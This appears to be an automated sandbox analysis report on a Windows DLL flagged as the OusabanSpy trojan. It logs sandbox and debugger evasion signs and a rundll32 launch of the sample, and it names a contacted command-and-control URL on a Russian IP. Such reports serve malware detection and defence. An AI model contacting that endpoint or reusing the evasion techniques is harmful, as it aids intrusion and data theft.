Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Switches to a custom stack to bypass stack traces
Source: C:\Windows\System32\loaddll32.exeAPI/Special instruction interceptor: Address: 6C4D73FB
Source: C:\Windows\System32\loaddll32.exeAPI/Special instruction interceptor: Address: 6C4BC236
Source: C:\Windows\System32\loaddll32.exeAPI/Special instruction interceptor: Address: 6D2443B0
Source: C:\Windows\System32\loaddll32.exeAPI/Special instruction interceptor: Address: 6C4E6720
Source: C:\Windows\System32\loaddll32.exeAPI/Special instruction interceptor: Address: 6D0DAB8D
Source: C:\Windows\System32\loaddll32.exeAPI/Special instruction interceptor: Address: 6C2E314A
Source: C:\Windows\System32\loaddll32.exeAPI/Special instruction interceptor: Address: 6D2A5475
Source: C:\Windows\System32\loaddll32.exeAPI/Special instruction interceptor: Address: 6D1DD12D
Source: C:\Windows\System32\loaddll32.exeAPI/Special instruction interceptor: Address: 6D32D673
Source: C:\Windows\System32\loaddll32.exeAPI/Special instruction interceptor: Address: 6D2641B8
Source: C:\Windows\System32\loaddll32.exeAPI/Special instruction interceptor: Address: 6D077FFB
Source: C:\Windows\System32\loaddll32.exeAPI/Special instruction interceptor: Address: 6D261491
Source: C:\Windows\System32\loaddll32.exeAPI/Special instruction interceptor: Address: 6C4F472C
Source: C:\Windows\System32\loaddll32.exeAPI/Special instruction interceptor: Address: 6D1785C2
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000Jump to behavior
Source: Amcache.hve.11.drBinary or memory string: VMware
Source: Amcache.hve.11.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.11.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.11.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.11.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.11.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.11.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.11.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.11.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.11.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.11.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.11.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.11.drBinary or memory string: vmci.sys
Source: Amcache.hve.11.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.11.drBinary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.11.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.11.drBinary or memory string: VMware-42 27 ae 88 8c 2b 21 02-a5 86 22 5b 84 51 ac f0
Source: Amcache.hve.11.drBinary or memory string: VMware20,1
Source: Amcache.hve.11.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.11.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.11.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.11.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.11.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.11.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.11.drBinary or memory string: VMware PCI VMCI Bus Device
Source: rundll32.exe, 00000006.00000002.2543893551.0000000003092000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll6/
Source: Amcache.hve.11.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.11.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.11.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.11.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Windows\System32\loaddll32.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.124.216.14 80Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Y7KU3yvGQ6.dll",#1Jump to behavior
Source: rundll32.exe, 00000006.00000002.2544670211.0000000004D58000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Program Manager@
Source: Amcache.hve.11.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.11.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.11.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.11.drBinary or memory string: MsMpEng.exe

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		112
Process Injection		1
Masquerading		1
Credential API Hooking		121
Security Software Discovery		Remote Services1
Credential API Hooking		1
Non-Application Layer Protocol		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Rundll32		LSASS Memory2
Process Discovery		Remote Desktop ProtocolData from Removable Media11
Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
Virtualization/Sandbox Evasion		Security Account Manager11
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook112
Process Injection		NTDS11
System Information Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1572153 Sample: Y7KU3yvGQ6.dll Startdate: 10/12/2024 Architecture: WINDOWS Score: 96 34 Suricata IDS alerts for network traffic 2->34 36 Antivirus / Scanner detection for submitted sample 2->36 38 Multi AV Scanner detection for submitted file 2->38 40 3 other signatures 2->40 8 loaddll32.exe 1 2->8         started        process3 signatures4 44 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 8->44 46 Overwrites code with function prologues 8->46 48 Switches to a custom stack to bypass stack traces 8->48 11 rundll32.exe 1 8->11         started        15 rundll32.exe 8->15         started        17 rundll32.exe 8->17         started        19 7 other processes 8->19 process5 dnsIp6 32 192.124.216.14, 49746, 80 EMBANK-ASRU Russian Federation 11->32 50 System process connects to network (likely due to code injection or exploit) 11->50 52 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 11->52 54 Overwrites code with function prologues 15->54 21 rundll32.exe 19->21         started        24 WerFault.exe 2 16 19->24         started        26 WerFault.exe 3 16 19->26         started        28 WerFault.exe 16 19->28         started        signatures7 process8 signatures9 42 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 21->42 30 WerFault.exe 20 16 21->30         started        process10

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Y7KU3yvGQ6.dll55%ReversingLabsWin32.Trojan.OusabanSpy
Y7KU3yvGQ6.dll44%VirustotalBrowse
Y7KU3yvGQ6.dll100%AviraHEUR/AGEN.1360814
Y7KU3yvGQ6.dll100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://www.indyproject.org/0%Avira URL Cloudsafe
http://192.124.216.14/conta/index.phpU0%Avira URL Cloudsafe
http://192.124.216.14/conta/index.php0%Avira URL Cloudsafe
http://www.indyproject.org/0%VirustotalBrowse
http://192.124.216.14/conta/index.php0%VirustotalBrowse

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://192.124.216.14/conta/index.phptrue
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
